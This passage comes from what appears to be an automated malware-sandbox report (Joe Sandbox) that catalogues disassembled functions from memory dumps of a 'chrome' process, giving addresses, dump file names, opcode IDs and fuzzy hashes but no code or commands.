                            Function 00007FFF7E3F027A Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 501b8b712558600b5cb52f111dd46b0408d94f460f4fab9f059ab3a657726a9b
                            • Instruction ID: 71d799843f542100d5c0485c868aa47d608f8c1cdf7fd0ed6eb05d2f0208ab95
                            • Opcode Fuzzy Hash: 501b8b712558600b5cb52f111dd46b0408d94f460f4fab9f059ab3a657726a9b
                            • Instruction Fuzzy Hash: 5CE086615186045FD385EF5890C0C5DBAE0EBA4744F40007BF046C3262DD31D4428712
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0F1F Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 656665bd3c3c1f16b3f6fe358189ea5a9d73f59146d416cae9e8a9d14842eca6
                            • Instruction ID: ba6b89d6ea8005a293c6d304d01ff0e44e9790c55311420a368939f186a6c16b
                            • Opcode Fuzzy Hash: 656665bd3c3c1f16b3f6fe358189ea5a9d73f59146d416cae9e8a9d14842eca6
                            • Instruction Fuzzy Hash: 57C01217B596425AF250A05CD84B5E43BC1E7952D17511536D526870A4F9545C470440
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F665D Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b370d36889163b4c0e568782b3f1b46f3136b060443a8b756d3965cf989cd614
                            • Instruction ID: ac7f85f0274337500d2e82205de140968ff58b12322737dd344db4528483fe8a
                            • Opcode Fuzzy Hash: b370d36889163b4c0e568782b3f1b46f3136b060443a8b756d3965cf989cd614
                            • Instruction Fuzzy Hash: B5C01277C2C11755BEA8682405504B8CECA4BD06509368037F05F37180EC7CA4055194
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F2ABE Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6b8ef0ff66e05dfb1432f3bf5cf0af358f2430edffbb92dd51baa69d5416e26
                            • Instruction ID: e99f5175131437116728af38d27203fa42c508a655828a70f27556e06cdfcd26
                            • Opcode Fuzzy Hash: a6b8ef0ff66e05dfb1432f3bf5cf0af358f2430edffbb92dd51baa69d5416e26
                            • Instruction Fuzzy Hash: ECD0A76541D6C38BE355CA38C484775BF80AF0131CF2545FDE4975E4D3A62CA51AD605
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F1AB5 Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 447b41364cc4e76558cb60aab871bc26d67c827e4eed0111ce74fc1a57d67413
                            • Instruction ID: 838d7dabfb57219e29a5a26e1dc63062eab8aa3b19a02d84ff6d214fa67947a6
                            • Opcode Fuzzy Hash: 447b41364cc4e76558cb60aab871bc26d67c827e4eed0111ce74fc1a57d67413
                            • Instruction Fuzzy Hash: 2ED01202A1E1454AD6461AA950202AD5CC64F89314F7802B7F04AD32D7DC2E59128246
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F6B54 Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9a4f0d282fe87b366f7aa6766f372f41645979a75bb41d8245c4d910ba81e9b7
                            • Instruction ID: 98b8de53671c0496ca279baa06e23d54c63a88e73708b5f7954b835fffe821b9
                            • Opcode Fuzzy Hash: 9a4f0d282fe87b366f7aa6766f372f41645979a75bb41d8245c4d910ba81e9b7
                            • Instruction Fuzzy Hash: 16C08C53A3864E3AD6D0F37C822A2F88CC1AF1A100344027AF60BE7387EC0C58000A81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0823 Relevance: .0, Instructions: 11COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 724283a945ccb6720e6a5d99d0503c6697da5fd5248abe48fff0ac2125007b08
                            • Instruction ID: a82ef9dcfeb5958934367f4768da9daa34e9de33f3ccf9f50995fb56aeff878d
                            • Opcode Fuzzy Hash: 724283a945ccb6720e6a5d99d0503c6697da5fd5248abe48fff0ac2125007b08
                            • Instruction Fuzzy Hash: CFC0123353924647915CDA18405242DF3D5B789A05F90553AF08792181DBA6A8024542
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F65FD Relevance: .0, Instructions: 11COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 177e9d092748e62b1b54b5c79be88d75c7068e02a9628a41165212568a74408a
                            • Instruction ID: 6d430811bf46dab31db6f842e300d417fd59b430eadc612f7511c646d1dd7a43
                            • Opcode Fuzzy Hash: 177e9d092748e62b1b54b5c79be88d75c7068e02a9628a41165212568a74408a
                            • Instruction Fuzzy Hash: 3ED0121394C08743FA5C797401574FE9DC61F42B54F8204BFA0171B3C7CC1D60426201
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F6AF0 Relevance: .0, Instructions: 8COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ef6a10f0d67ec8c5f87717626f5c3e46f6d464b230c0fa477d15531b6304a3c6
                            • Instruction ID: e8983f92781e61a083ee831fb73b3f595b98e3cf4a3c0cf14edd90d59e761664
                            • Opcode Fuzzy Hash: ef6a10f0d67ec8c5f87717626f5c3e46f6d464b230c0fa477d15531b6304a3c6
                            • Instruction Fuzzy Hash: 68B01230C4360B41DA183531194704831909B05104FC00575D40440141E86F51D74242
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F61A0 Relevance: .0, Instructions: 8COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ef6a10f0d67ec8c5f87717626f5c3e46f6d464b230c0fa477d15531b6304a3c6
                            • Instruction ID: e8983f92781e61a083ee831fb73b3f595b98e3cf4a3c0cf14edd90d59e761664
                            • Opcode Fuzzy Hash: ef6a10f0d67ec8c5f87717626f5c3e46f6d464b230c0fa477d15531b6304a3c6
                            • Instruction Fuzzy Hash: 68B01230C4360B41DA183531194704831909B05104FC00575D40440141E86F51D74242
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F4F03 Relevance: .0, Instructions: 7COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c5edd8fa72317439e962c581036c6efd387c7ecbd6fcb9669ab42802adb3567
                            • Instruction ID: 8324432331678a50c020dc809b44d57c9e626968c8b1e32ace3625ba4b84bbb8
                            • Opcode Fuzzy Hash: 9c5edd8fa72317439e962c581036c6efd387c7ecbd6fcb9669ab42802adb3567
                            • Instruction Fuzzy Hash: 80B0920243C54A2AA290A6AC01A8174ECC18E16100709027AA94EDA292EC0C84445A52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F6629 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 029489d0784bdd490308beecaad6f43e5ecd8e11723ad261e3276e2d349bd1a0
                            • Instruction ID: bbf560bca213eb8b5d2ec14e1e8f8db9aaf76b18ae68705cd6356350441b9c90
                            • Opcode Fuzzy Hash: 029489d0784bdd490308beecaad6f43e5ecd8e11723ad261e3276e2d349bd1a0
                            • Instruction Fuzzy Hash: 58A0011291828683FEA92A9584A26BD8D9A4F91754E254537A12B2A1C68C1CAA135292
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 00007FFF7E401CCC Relevance: .1, Instructions: 120COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7e8657a9721c61187a2beeb6166b0ca93e5bf9c3e8d0a46ca26044df5d5b628e
                            • Instruction ID: 3395399c912543d30720f61d79a053f54571deb984c85d02489e3222c72b5a83
                            • Opcode Fuzzy Hash: 7e8657a9721c61187a2beeb6166b0ca93e5bf9c3e8d0a46ca26044df5d5b628e
                            • Instruction Fuzzy Hash: 8B31292560D7890FD31BAA348855562BFA5EF87210B1582FFD0D6CB5E7DD285807C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E401C9B Relevance: .1, Instructions: 116COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 95d1777218f68f286567c119feed10924efd7df0decd301de1e4c346b3486899
                            • Instruction ID: be8af5848816afce7f2b33570489f305e260eff55a15dd5c622a36e59822dc5e
                            • Opcode Fuzzy Hash: 95d1777218f68f286567c119feed10924efd7df0decd301de1e4c346b3486899
                            • Instruction Fuzzy Hash: 3E31262250D7890FD31B9A348C695627FA6DB87210B1A82FFD4C6CB1A7D8286C07C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E401D60 Relevance: .1, Instructions: 93COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a2ce7a29c480d311bc3d79a731ed87f1839b566c06709d88ef1e0c6f2a774a66
                            • Instruction ID: 4f70370fdd8d496d7766debfdc6587cdd648079e1fc269bab427ef9f57ffc783
                            • Opcode Fuzzy Hash: a2ce7a29c480d311bc3d79a731ed87f1839b566c06709d88ef1e0c6f2a774a66
                            • Instruction Fuzzy Hash: 12210B2660D6C51FD31B9A398C69462BFAADBC711071A82EFD4C6CB5E3DD285807C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406B8B Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID: py.~
                            • API String ID: 0-2917235016
                            • Opcode ID: c56cce715f2668b6decfceecf0d3e98bde17332ad18666d8f58bc158055fa8ab
                            • Instruction ID: c41966d1f7fac35cf423d3146866bc062d44262fe6f6c1b43aa4aeb82d4f6b70
                            • Opcode Fuzzy Hash: c56cce715f2668b6decfceecf0d3e98bde17332ad18666d8f58bc158055fa8ab
                            • Instruction Fuzzy Hash: E7F0CD3671841A0BE78CBA6884AA2BD62C2EF85300B5001BEE40BCB2D6DC2CA8520395
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E401182 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID: `W.~
                            • API String ID: 0-3475719485
                            • Opcode ID: 542458fd4baf7a87cc669599652d7ef054e718e096c0223339431a08bec4e7f2
                            • Instruction ID: f9f04d1fc2cba07feabf6a3bf4dcf5aeb6b60ad2448795eac2a8e3f8d3aae39e
                            • Opcode Fuzzy Hash: 542458fd4baf7a87cc669599652d7ef054e718e096c0223339431a08bec4e7f2
                            • Instruction Fuzzy Hash: 7AD01205714A0D4A9694BA2C51D86E9A3C1EB58255780157B944BC3993DD59B4470780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E404ED8 Relevance: 1.3, Strings: 1, Instructions: 6COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID: #6^_^
                            • API String ID: 0-3410500413
                            • Opcode ID: 99d74f04fbea49d1f56d4c40b2058768555da7ebafa3ec1a988860f702233b99
                            • Instruction ID: 022a1151f057f3a61f362c48d864c46a1428d091c2b59645e8d8963018bb39fd
                            • Opcode Fuzzy Hash: 99d74f04fbea49d1f56d4c40b2058768555da7ebafa3ec1a988860f702233b99
                            • Instruction Fuzzy Hash: EFA012112348060A32C87654001823900C2AB94050B204436540EC328ADC14C8030101
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E404FD2 Relevance: 1.3, Strings: 1, Instructions: 6COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID: 5^_^
                            • API String ID: 0-424247050
                            • Opcode ID: 59f3f045b74f13425f0f248cbb02249409e2c596ade1468d9c4985d23b44bd0e
                            • Instruction ID: 0e6963878779a38f15b0276dbacbb52cec8a5d133b6eeba6cb830fa62225f130
                            • Opcode Fuzzy Hash: 59f3f045b74f13425f0f248cbb02249409e2c596ade1468d9c4985d23b44bd0e
                            • Instruction Fuzzy Hash: 75A0120823C80E1B31C571D4008952054C1574411074040311809C1183DC2498010A08
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400AA0 Relevance: .1, Instructions: 80COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1481ac046bb1a6741105e2df1f09ec8707a79f6a69c2232b787185ac7b0f2b75
                            • Instruction ID: bcc925e523ad34a25f075e65cd6e82b0830a30203e72bcc43dc3678fbda919bb
                            • Opcode Fuzzy Hash: 1481ac046bb1a6741105e2df1f09ec8707a79f6a69c2232b787185ac7b0f2b75
                            • Instruction Fuzzy Hash: BD11043370C5091FA72C9C69AC4A477B38BD3C6230B51D33FE597C26AAED69A81341C8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E402867 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0559878e2a9a53c0c09775af1481b0e2c7e59071f3b50d6a06b7cd24a99afe67
                            • Instruction ID: ac2621f893b7d137e3c9c38de4e4345084df5f09439b96e347d9b23986894f6c
                            • Opcode Fuzzy Hash: 0559878e2a9a53c0c09775af1481b0e2c7e59071f3b50d6a06b7cd24a99afe67
                            • Instruction Fuzzy Hash: 88112B3650C2454FD31DDA758C5A8A27BA5EB4322031A42EEE486C71A3E5689C078795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400140 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8a4f5f3824209e4dacc6ad955dc5591e59b5751175840d0d81ac17c5fc948dcf
                            • Instruction ID: 90e5a43d6dddb7cbf5ae3d76605cddb3c5c4879eec7f988d1101116a7d062b95
                            • Opcode Fuzzy Hash: 8a4f5f3824209e4dacc6ad955dc5591e59b5751175840d0d81ac17c5fc948dcf
                            • Instruction Fuzzy Hash: 2921047AA4860B8BE710EFA8E8855EDB3E1EF84325F000477D145DB251DE3AA6568B81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400A98 Relevance: .1, Instructions: 67COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7f3638eb3284a9057c2d37a5329c07c9644451e0303acf6463ff447261368fdc
                            • Instruction ID: 5f019123d50ea5b08534900412d19da3a50c9fd76073a59feec5365934eb81a8
                            • Opcode Fuzzy Hash: 7f3638eb3284a9057c2d37a5329c07c9644451e0303acf6463ff447261368fdc
                            • Instruction Fuzzy Hash: BD01F73360C10D1FA21CE86AAC4B8B6B39AE742230761527FF487C26A3FC55AC1341C4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E40221D Relevance: .1, Instructions: 66COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d4bfd5e5520cc983bab9136e6d8858bad50730d40c2208afd6b205b467ddccbe
                            • Instruction ID: 9ea50b3f7ff5182ac37a9a62566a8043fea9887e22a059e6561002221b858dec
                            • Opcode Fuzzy Hash: d4bfd5e5520cc983bab9136e6d8858bad50730d40c2208afd6b205b467ddccbe
                            • Instruction Fuzzy Hash: 7D11843162C6424FD31DDA14C4E297AB7E2EF96301B2485BEE487871D7D928F842C796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E402251 Relevance: .1, Instructions: 59COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d31bff61aa7b2276a5f0ecbfd4b73da0d838d01f6008494a704691c8ad23bd7d
                            • Instruction ID: 56aba5bab82882662e8f207baf80ee1a0cf023d17159e717f24866c1d57c9b46
                            • Opcode Fuzzy Hash: d31bff61aa7b2276a5f0ecbfd4b73da0d838d01f6008494a704691c8ad23bd7d
                            • Instruction Fuzzy Hash: 4F1173306287058FC74CDE08C4E597AB7E2FBD9305B24597DE48787295CA34F882CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400170 Relevance: .1, Instructions: 55COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a75d12d2d7ab867b408238c667d0c17b9a14bf5d75802a6188200a022778d30a
                            • Instruction ID: 42639aac5d749259f1f3047493bf13e82b3a911e88166bb1916c4017d7382e3f
                            • Opcode Fuzzy Hash: a75d12d2d7ab867b408238c667d0c17b9a14bf5d75802a6188200a022778d30a
                            • Instruction Fuzzy Hash: 0111C17AE5854B8BEB10DE58D8451FEB7F1FF84314F0004B6E50A9B281DE396A158781
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E404FF8 Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: efe540dd443df57c19b7598a5828a2f76702ea0647eabbd0ee0223b1362823a7
                            • Instruction ID: f5d0f3cef1e5c7852e7a5ecb3398ccafc3fda2e00e932e033d711bf02e061738
                            • Opcode Fuzzy Hash: efe540dd443df57c19b7598a5828a2f76702ea0647eabbd0ee0223b1362823a7
                            • Instruction Fuzzy Hash: AF015225B2C54A4FDB58EE2984D953DB6C2FF98201B1544BFE44FCB292DD2DE8415701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E402E87 Relevance: .0, Instructions: 50COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4598a03431ca8e7e0b02c27dc40870ff456f682caf0c87f8616ad4b5ad477ff
                            • Instruction ID: a27f2952b568d4926482cf40b07c28b15046dd5e910f2547244592bf85d66995
                            • Opcode Fuzzy Hash: a4598a03431ca8e7e0b02c27dc40870ff456f682caf0c87f8616ad4b5ad477ff
                            • Instruction Fuzzy Hash: 1F01DE3654EBC60FC7469B3488650A57FF1EF9722031942EFD082CB1E3EA18680AC792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E40154C Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c6bca204cb1d38a9022989450edc610c908b6c328876b5ef9c216a1061a44256
                            • Instruction ID: a36c5fb62de50430e4d706ef13ff687a80c2eee5dafb60ce1ec445db0a60ce2f
                            • Opcode Fuzzy Hash: c6bca204cb1d38a9022989450edc610c908b6c328876b5ef9c216a1061a44256
                            • Instruction Fuzzy Hash: 1401A2317282064F871CDA2D849146AB2E7F7C9704720D67FE08BC73DADE38E9068A85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406AB0 Relevance: .0, Instructions: 42COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f68cddf93b30d2a76bcb8e5a430a5825ef58d66ec538274d58d6ac6d6e116aaf
                            • Instruction ID: 8f96982b329f6bfb32d74f80a25c06409b78e687246d3f4b2e89b0c7aa0370dc
                            • Opcode Fuzzy Hash: f68cddf93b30d2a76bcb8e5a430a5825ef58d66ec538274d58d6ac6d6e116aaf
                            • Instruction Fuzzy Hash: 5B01B2A648E7D20FC7439B744874290BFB09F13224B5E81EBC4C58F4A3E28E084AD762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E400B30 Relevance: .0, Instructions: 41COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 20615e1d9e760c0a59847156be5f84921a3fa1dc8166cfb0eebf4af0d66d8c6c
                            • Instruction ID: 7991db39b2e80918ce577ad9db34e65c3da842dee942f36fe44c5e1853132379
                            • Opcode Fuzzy Hash: 20615e1d9e760c0a59847156be5f84921a3fa1dc8166cfb0eebf4af0d66d8c6c
                            • Instruction Fuzzy Hash: 1AF0593271480A0BC758D9298C984BB73D6EBD4331750037BE007C72E4DD6925428780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E402650 Relevance: .0, Instructions: 40COMMON
                            Download Yara Rule
                            Memory Dump Source
